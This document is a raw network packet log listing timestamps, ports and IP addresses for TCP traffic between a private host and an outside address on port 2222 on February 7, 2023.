Feb 7, 2023 18:30:31.066000938 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.066245079 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.066252947 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.066278934 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.066303968 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.066350937 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.066435099 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.066498995 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.066606045 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.066756964 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.066765070 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.066775084 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.066775084 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.066977024 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.067038059 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.067049026 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.067267895 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.067312956 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.067608118 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.067694902 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.067776918 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.067799091 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.067950010 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.068010092 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.068135023 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.068145037 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.068154097 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.068515062 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.068526030 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.068658113 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.068820000 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.068871021 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.069021940 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.069192886 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.069214106 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.069225073 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.069232941 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.069570065 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.069581032 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.069588900 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.069595098 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.069673061 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.069700956 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.069961071 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.070039034 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.070049047 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.070472002 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.070521116 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.070544958 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.070555925 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.070570946 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.070744991 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.070801020 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.070913076 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.071007013 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.071017027 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.071160078 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.071331024 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.071501017 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.071683884 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.071695089 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.071753025 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.071903944 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.071996927 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.072014093 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.072021961 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.072030067 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.072043896 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.072216034 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.072386980 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.072551966 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.072560072 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.072567940 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.072946072 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.072993040 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.073023081 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.073034048 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.073054075 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.073132992 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.073213100 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.073384047 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.073616028 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.073658943 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.073949099 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.073995113 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.074006081 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.074166059 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.074230909 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.074278116 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.074327946 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.074327946 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.074493885 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.074505091 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.074837923 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.075149059 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.075158119 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.075341940 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.075495005 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.075571060 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.075655937 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.075664043 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.075817108 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.075987101 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.076067924 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.076076984 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.076159954 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.076210022 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.076313019 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.076483965 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.076565027 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.076572895 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.076581001 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.076653004 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.076822996 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.076992989 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.077099085 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.077106953 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.077115059 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.077164888 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.077476025 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.077483892 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.077600956 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.077600956 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.077699900 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.077800035 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.077800035 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.077960014 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.077967882 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.078443050 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.078452110 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.078459978 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.078507900 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.078557014 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.078567982 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.078943968 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.079111099 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.079170942 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.079222918 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.079269886 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.079332113 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.079500914 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.079520941 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.079566956 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.079576969 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.079585075 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.079670906 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.079842091 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.080012083 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.080073118 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.080085039 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.080568075 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.080615044 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.080663919 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.099987030 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.100246906 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.100508928 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.100606918 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.100616932 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.100625038 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.100632906 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.100967884 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.101098061 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.101108074 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.101115942 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.101124048 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.101130962 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.101198912 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.101248980 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.101298094 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.101356983 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.101408958 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.101418972 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.101527929 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.101538897 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.101697922 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.101710081 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.102042913 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.102054119 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.102222919 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.102380991 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.102560997 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.102571011 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.102579117 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.102945089 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.102952957 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.102999926 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.103169918 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.103192091 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.103235006 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.103245020 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.103363037 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.103363037 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.103463888 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.103471994 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.103533983 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.103609085 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.103724957 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.103873968 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.104027033 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.104182959 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.104192972 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.104201078 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.104403019 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.104475975 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.104496956 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.104837894 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.104849100 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.104856014 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.104863882 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.104871035 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.104984045 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.105004072 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.105179071 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.105245113 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.105256081 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.105263948 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.105271101 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.105271101 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.105271101 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.105278969 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.105654001 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.105664968 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.105671883 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.105679989 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.105686903 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.105700016 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.105799913 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.105882883 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.105963945 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.105981112 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.106018066 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.106190920 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.106340885 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.106697083 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.106708050 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.106715918 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.106723070 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.106730938 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.107080936 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.107254028 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.107302904 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.107341051 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.107350111 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.107353926 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.107357025 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.107533932 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.107547045 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.107619047 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.107629061 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.107636929 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.107662916 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.107707977 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.107736111 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.107866049 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.108033895 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.108033895 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.108184099 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.108397007 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.108627081 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.108642101 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.108907938 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.109175920 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.109185934 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.109211922 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.109220982 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.109227896 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.109236002 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.109256983 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.109309912 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.109500885 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.109513044 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.109525919 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.109529018 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.109536886 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.109579086 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.109699011 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.109699011 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.110038996 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.110039949 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.110049963 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.110058069 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.110346079 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.110647917 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.110694885 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.111141920 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111150980 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111187935 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111282110 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111396074 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.111407995 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111418962 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111567020 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111568928 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.111577988 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111579895 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.111586094 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111593962 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111601114 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111628056 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.111787081 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.111953974 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.111953974 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.112051964 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.112061977 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.112071037 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.112078905 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.112097025 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.112262011 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.112435102 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.112601995 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.112889051 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.112898111 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113014936 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113035917 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113044024 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113050938 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113059044 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113061905 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.113082886 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113157988 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.113378048 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.113471985 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.113563061 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.113594055 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113604069 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113611937 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113620996 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113629103 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.113657951 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.114002943 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.114052057 CET	49855	2222	192.168.11.20	92.177.204.2
Feb 7, 2023 18:30:31.114082098 CET	2222	49855	92.177.204.2	192.168.11.20
Feb 7, 2023 18:30:31.114092112 CET	2222	49855	92.177.204.2	192.168.11.20
